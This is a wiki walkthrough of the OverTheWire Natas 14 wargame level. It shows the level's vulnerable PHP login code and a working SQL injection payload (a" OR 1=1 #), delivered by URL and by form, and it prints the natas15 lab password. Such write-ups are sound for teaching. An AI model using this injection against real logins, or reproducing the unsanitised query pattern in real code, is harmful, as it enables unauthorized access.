Natas14 - natas15

From JaxHax
Jump to: navigation, search

Level Goal

Username: [__________________]
Password: [__________________]
[Login]
                       <View sourcecode>


Solution

Decided to click the <View sourcecode> link which goes to http://natas14.natas.labs.overthewire.org/index-source.html. It gave me the following code:

<html>
   <head>
      <!-- This stuff in the header has nothing to do with the level -->
      <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
      <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
      <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
      <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
      <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script>
      <script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
      <script>var wechallinfo = { "level": "natas14", "pass": "<censored>" };</script>
   </head>
   <body>
      <h1>natas14</h1>
      <div id="content">
<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
 
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }
 
    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>
 
         <form action="index.php" method="POST">
            Username: <input name="username"><br>
            Password: <input name="password"><br>
            <input type="submit" value="Login" />
         </form>
<? } ?>
         <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
      </div>
   </body>
</html>


So the PHP code is a classic SQL injection bug. By dumping our values straight into the query without sanity checks...


Another interesting thing is that we can do this via GET and if we set 'debug', we should see our query! The goal here is to make it return 1 or more rows record. This should be simple.


Basically the query is:

SELECT * FROM users WHERE username="[username]" AND password="[password]";


This query should only return a row if a user enters a valid username and password. So let's say we enter the following:

username: test
password: pass


The query would be:

SELECT * FROM users WHERE username="test" AND password="pass";


Now, we can preform an injection to modify the query like so:

username: a" OR 1=1 #
password: pass


The query would be:

SELECT * FROM users WHERE username="a" OR 1=1 #" and password="pass";


This query should return all values in the DB because 1=1 is always true. The # comments out the rest of the query so it's ignored, negating the password field.


So there are two ways we can inject this. Via the form, or via the URL.


Via the URL:

Visit http://natas14.natas.labs.overthewire.org/?username=a%22%20OR%201%3D1%20%23&password=fdsf&debug=1


you will receive the following:

Executing query: SELECT * from users where username="a" OR 1=1 #" and password="fdsf"
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J


Via the Form:

Username: [_a" OR 1=1 #______]
Password: [_whatever_________]
[Login]
                       <View sourcecode>


Once we submit these values the server will return:

Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J


Two ways to pull it off, the url method allows us to get debug feedback but it really wasn't needed.